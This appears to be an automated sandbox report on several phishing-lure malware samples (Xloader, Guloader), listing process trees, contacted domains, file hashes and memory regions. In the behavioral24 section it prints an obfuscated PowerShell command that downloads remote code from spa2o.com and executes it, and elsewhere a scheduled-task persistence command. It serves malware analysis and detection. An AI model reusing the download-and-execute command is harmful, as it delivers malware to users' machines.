"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
Network
Files
memory/2600-0-0x00000000749FE000-0x00000000749FF000-memory.dmp
memory/2600-1-0x0000000000070000-0x000000000015E000-memory.dmp
memory/2600-2-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2600-3-0x0000000000350000-0x0000000000360000-memory.dmp
memory/2600-4-0x00000000749FE000-0x00000000749FF000-memory.dmp
memory/2600-5-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2600-6-0x0000000006050000-0x000000000611C000-memory.dmp
memory/2600-7-0x0000000000840000-0x000000000088E000-memory.dmp
memory/2716-9-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-17-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-15-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2716-12-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-11-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-20-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-19-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2600-21-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-22-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-23-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-24-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-25-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-26-0x00000000749F0000-0x00000000750DE000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
149s
Max time network
123s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1292 set thread context of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe |
| PID 3008 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 3008 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 2656 set thread context of 1200 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp"
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"{path}"
C:\Windows\SysWOW64\NAPSTAT.EXE
"C:\Windows\SysWOW64\NAPSTAT.EXE"
Network
Files
memory/1292-3-0x00000000005B0000-0x00000000005BA000-memory.dmp
memory/1292-2-0x0000000074C40000-0x000000007532E000-memory.dmp
memory/1292-1-0x0000000000160000-0x0000000000202000-memory.dmp
memory/1292-0-0x0000000074C4E000-0x0000000074C4F000-memory.dmp
memory/1292-4-0x0000000074C4E000-0x0000000074C4F000-memory.dmp
memory/1292-5-0x0000000074C40000-0x000000007532E000-memory.dmp
memory/1292-6-0x00000000055E0000-0x0000000005664000-memory.dmp
memory/1292-7-0x0000000004160000-0x0000000004190000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp
| MD5 | 235df9cb13f0e61134099fa3131b4200 |
| SHA1 | 03a5ee592b869bfebd8c9c586c0510d53e6b96a3 |
| SHA256 | 279cb4ce033c1a0d71e0bae2156173a2d648c6c278f5b47bc64e332a702efa6a |
| SHA512 | 36b67e96bbab613f98f27d105607a58e82ea4048d536e8238b3119c3ae200ffaede642ac865918ef30027af51b86c037e57e3f3b3ee9be574993f72f577e1aaf |
memory/3008-11-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3008-13-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3008-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3008-18-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3008-20-0x0000000000800000-0x0000000000B03000-memory.dmp
memory/1292-19-0x0000000074C40000-0x000000007532E000-memory.dmp
memory/3008-23-0x0000000000650000-0x0000000000661000-memory.dmp
memory/3008-22-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1200-24-0x0000000006680000-0x0000000006752000-memory.dmp
memory/3008-27-0x0000000000B30000-0x0000000000B41000-memory.dmp
memory/1200-28-0x0000000006760000-0x000000000688C000-memory.dmp
memory/3008-26-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1200-29-0x0000000006680000-0x0000000006752000-memory.dmp
memory/2656-31-0x0000000000DB0000-0x0000000000DF6000-memory.dmp
memory/2656-30-0x0000000000DB0000-0x0000000000DF6000-memory.dmp
memory/2656-32-0x0000000000080000-0x00000000000A9000-memory.dmp
memory/1200-33-0x0000000006760000-0x000000000688C000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4988 set thread context of 4072 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe |
| PID 4072 set thread context of 3508 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 4072 set thread context of 3508 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 756 set thread context of 3508 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp"
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"{path}"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.knowunknow.com | udp |
| US | 104.18.217.221:80 | www.knowunknow.com | tcp |
| US | 8.8.8.8:53 | 221.217.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sarrosh.com | udp |
| US | 8.8.8.8:53 | www.apollorealtors.com | udp |
| NL | 212.32.237.92:80 | www.apollorealtors.com | tcp |
| US | 8.8.8.8:53 | 92.237.32.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.suddennnnnnnnnnnn02.xyz | udp |
| US | 8.8.8.8:53 | www.webdesigncharlestonsc.com | udp |
| US | 162.244.253.20:80 | www.webdesigncharlestonsc.com | tcp |
| US | 8.8.8.8:53 | 20.253.244.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.cacaolixir.com | udp |
| US | 3.33.130.190:80 | www.cacaolixir.com | tcp |
| US | 8.8.8.8:53 | 190.130.33.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.avaxbridgeapes.com | udp |
| FR | 13.32.145.56:80 | www.avaxbridgeapes.com | tcp |
| US | 8.8.8.8:53 | 56.145.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.palmsugar.biz | udp |
| US | 8.8.8.8:53 | www.zvedaventeco.quest | udp |
| US | 8.8.8.8:53 | www.724ototamir.com | udp |
| US | 8.8.8.8:53 | www.tenlog001.xyz | udp |
| US | 8.8.8.8:53 | www.dazalogistics.com | udp |
| US | 76.223.105.230:80 | www.dazalogistics.com | tcp |
| US | 8.8.8.8:53 | 230.105.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4988-0-0x0000000074D5E000-0x0000000074D5F000-memory.dmp
memory/4988-1-0x0000000000740000-0x00000000007E2000-memory.dmp
memory/4988-2-0x00000000056D0000-0x0000000005C74000-memory.dmp
memory/4988-3-0x00000000051C0000-0x0000000005252000-memory.dmp
memory/4988-4-0x0000000005260000-0x00000000052FC000-memory.dmp
memory/4988-5-0x0000000074D50000-0x0000000075500000-memory.dmp
memory/4988-6-0x0000000005190000-0x000000000519A000-memory.dmp
memory/4988-7-0x00000000055B0000-0x00000000055BA000-memory.dmp
memory/4988-8-0x0000000074D5E000-0x0000000074D5F000-memory.dmp
memory/4988-9-0x0000000074D50000-0x0000000075500000-memory.dmp
memory/4988-10-0x00000000081B0000-0x0000000008234000-memory.dmp
memory/4988-11-0x0000000006F10000-0x0000000006F40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp
| MD5 | 9c5f354653322ec06ab4ebb449e2437b |
| SHA1 | 375d5329debbebcf8688639c7ef7981aa77f5534 |
| SHA256 | 8c6ac426262941b59edd01a7e5999cc822f25e8ef4cd9bf5d40e63f00d32faf2 |
| SHA512 | a97317b55c144fdc08a91c69fef2d40098991ab13a45ceecbd75eabba357ec9f41612b5b1bcc7b4c8e27875b74a6e0ca7019ca8a610eaae2e9de7eb5223f6175 |
memory/4072-15-0x0000000000400000-0x0000000000429000-memory.dmp
memory/4988-17-0x0000000074D50000-0x0000000075500000-memory.dmp
memory/4072-18-0x0000000001710000-0x0000000001A5A000-memory.dmp
memory/4072-20-0x0000000000400000-0x0000000000429000-memory.dmp
memory/4072-21-0x0000000001690000-0x00000000016A1000-memory.dmp
memory/3508-22-0x0000000003D40000-0x0000000003DEF000-memory.dmp
memory/4072-25-0x0000000003410000-0x0000000003421000-memory.dmp
memory/3508-26-0x0000000007A00000-0x0000000007B10000-memory.dmp
memory/4072-24-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3508-27-0x0000000003D40000-0x0000000003DEF000-memory.dmp
memory/756-28-0x0000000000B10000-0x0000000000F43000-memory.dmp
memory/756-30-0x0000000000B10000-0x0000000000F43000-memory.dmp
memory/756-31-0x0000000001250000-0x0000000001279000-memory.dmp
memory/3508-32-0x0000000007A00000-0x0000000007B10000-memory.dmp
memory/3508-36-0x0000000007ED0000-0x0000000008042000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2436 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2436 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2436 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe
"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | spa2o.com | udp |
| HR | 185.58.73.32:80 | spa2o.com | tcp |
Files
memory/2436-0-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp
memory/2436-1-0x0000000001220000-0x0000000001228000-memory.dmp
memory/2704-6-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp
memory/2704-8-0x000000001B810000-0x000000001BAF2000-memory.dmp
memory/2704-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2704-9-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2704-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2704-11-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2704-12-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2704-13-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2704-14-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
memory/2704-15-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp
memory/2704-16-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
118s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls
Network
Files
memory/2648-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2648-1-0x000000007278D000-0x0000000072798000-memory.dmp
memory/2648-2-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-13-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-15-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-14-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-12-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-11-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-10-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-9-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-7-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-6-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-5-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-4-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-3-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-8-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2648-16-0x000000007278D000-0x0000000072798000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls
Network
Files
memory/2716-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2716-1-0x00000000727CD000-0x00000000727D8000-memory.dmp
memory/2716-16-0x00000000727CD000-0x00000000727D8000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240729-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe
"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"
Network
Files
\Users\Admin\AppData\Local\Temp\nsuF539.tmp\Math.dll
| MD5 | 85428cf1f140e5023f4c9d179b704702 |
| SHA1 | 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba |
| SHA256 | 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a |
| SHA512 | dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59 |
\Users\Admin\AppData\Local\Temp\nsuF539.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
memory/1824-17-0x00000000042A0000-0x00000000043A0000-memory.dmp
memory/1824-18-0x00000000042A0000-0x00000000043A0000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
144s
Max time network
153s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe
"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sync-shop.com | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
